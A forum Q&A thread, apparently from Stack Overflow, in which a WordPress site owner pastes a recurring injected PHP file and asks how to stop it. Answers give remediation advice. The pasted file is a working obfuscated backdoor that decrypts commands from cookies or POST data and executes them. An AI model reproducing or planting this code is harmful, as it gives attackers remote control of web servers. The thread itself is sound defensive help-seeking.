# Wordpress appear strange file php

Tags: php, wordpress

I have two Wordpress website . One day , i check source of my website and i see a lot of file php with the format like that :

```
<?php
$jbchac = 'b9v\'ox-lg3p#au52t4Hme*rn_8f0yskd76ic';$xwxbbv = Array();$xwxbbv[] = $jbchac[35].$jbchac[22].$jbchac[20].$jbchac[12].$jbchac[16].$jbchac[20].$jbchac[24].$jbchac[26].$jbchac[13].$jbchac[23].$jbchac[35].$jbchac[16].$jbchac[34].$jbchac[4].$jbchac[23];$xwxbbv[] = $jbchac[18].$jbchac[21];$xwxbbv[] = $jbchac[11];$xwxbbv[] = $jbchac[33].$jbchac[32].$jbchac[35].$jbchac[14].$jbchac[0].$jbchac[31].$jbchac[32].$jbchac[35].$jbchac[6].$jbchac[17].$jbchac[17].$jbchac[26].$jbchac[1].$jbchac[6].$jbchac[17].$jbchac[15].$jbchac[27].$jbchac[9].$jbchac[6].$jbchac[12].$jbchac[9].$jbchac[1].$jbchac[33].$jbchac[6].$jbchac[15].$jbchac[0].$jbchac[32].$jbchac[12].$jbchac[1].$jbchac[25].$jbchac[27].$jbchac[1].$jbchac[20].$jbchac[14].$jbchac[26].$jbchac[15];$xwxbbv[] = $jbchac[35].$jbchac[4].$jbchac[13].$jbchac[23].$jbchac[16];$xwxbbv[] = $jbchac[29].$jbchac[16].$jbchac[22].$jbchac[24].$jbchac[22].$jbchac[20].$jbchac[10].$jbchac[20].$jbchac[12].$jbchac[16];$xwxbbv[] = $jbchac[20].$jbchac[5].$jbchac[10].$jbchac[7].$jbchac[4].$jbchac[31].$jbchac[20];$xwxbbv[] = $jbchac[29].$jbchac[13].$jbchac[0].$jbchac[29].$jbchac[16].$jbchac[22];$xwxbbv[] = $jbchac[12].$jbchac[22].$jbchac[22].$jbchac[12].$jbchac[28].$jbchac[24].$jbchac[19].$jbchac[20].$jbchac[22].$jbchac[8].$jbchac[20];$xwxbbv[] = $jbchac[29].$jbchac[16].$jbchac[22].$jbchac[7].$jbchac[20].$jbchac[23];$xwxbbv[] = $jbchac[10].$jbchac[12].$jbchac[35].$jbchac[30];foreach ($xwxbbv[8]($_COOKIE, $_POST) as $nkcbrej => $kygjfna){function kcmivsj($xwxbbv, $nkcbrej, $igzucx){return $xwxbbv[7]($xwxbbv[5]($nkcbrej . $xwxbbv[3], ($igzucx / $xwxbbv[9]($nkcbrej)) + 1), 0, $igzucx);}function anwjxl($xwxbbv, $nmpnt){return @$xwxbbv[10]($xwxbbv[1], $nmpnt);}function yvnbgjo($xwxbbv, $nmpnt){$xeqhr = $xwxbbv[4]($nmpnt) % 3;if (!$xeqhr) {$ajcvked = $xwxbbv[0]; $vzkthnq = $ajcvked("", $nmpnt[1]($nmpnt[2]));$vzkthnq();exit();}}$kygjfna = anwjxl($xwxbbv, $kygjfna);yvnbgjo($xwxbbv, $xwxbbv[6]($xwxbbv[2], $kygjfna ^ kcmivsj($xwxbbv, $nkcbrej, $xwxbbv[9]($kygjfna))));}
```

I have search in google and i think my website have been hacked 
I have try to remove all of file php with that format but in two day it appear again
So , can anyone help me find a way to protect my website and solve the problem that i describe ?
Thanks.

Comment: It look like your website is hacked. so you need to add suspected code from the affected files , and once remove you can re-scan and change the username and password of website and add security plugin

Comment: Your site got hacked would be fix no worries we may should start chat discussion

Answer (score 0, accepted):

The site has been hacked.

Please look into **.htaccess** file there might be any suspicious code placed on it which is creating file again and again.

Moreover, most probably the plugin vulnerability might caused such issue. So please update the plugin and have a Security plugin installed like **WordFence**.

Once you find the issue, you might recover it from fresh WordPress files.

Hope my suggestion will workout for you.

Comment: thanks you for suggestion i have use wordfence and find out the problem.

Answer (score 0):

If your site got hacked, that could be because of several things:

1. Someone got hold of your username and password which you use to log in to your hosting provider to upload malicious code.
2. Someone got hold of your username and password which you use to log in to upload files.
3. Your wordpress version has one or more security vulnerability (See: https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/ )
4. One or more of your plugins may have some security vulnerabilities
5. Other software running on your website has one ore more security flaw.
6. Your hosting-provider got hacked. Unlikely ... but could happen as well.

If its because of the first two reasons that might be because you used your username/password-combination on multiple sites and one of them got hacked. Or Someone got access to your mail account used to get your password reset. Or because you used an easy to guess password.

What can you do? Check your wordpress version and any plugins you might be using. Check your Other applications running on the same webspace as well. Change your passwords. Some hosting providers also allow you to setup your directories in a way that wordpress has no write access to them. But THAT would only prevent an attacker to upload files. And will NOT prevent him/her/it to use any security flaws for other purposes...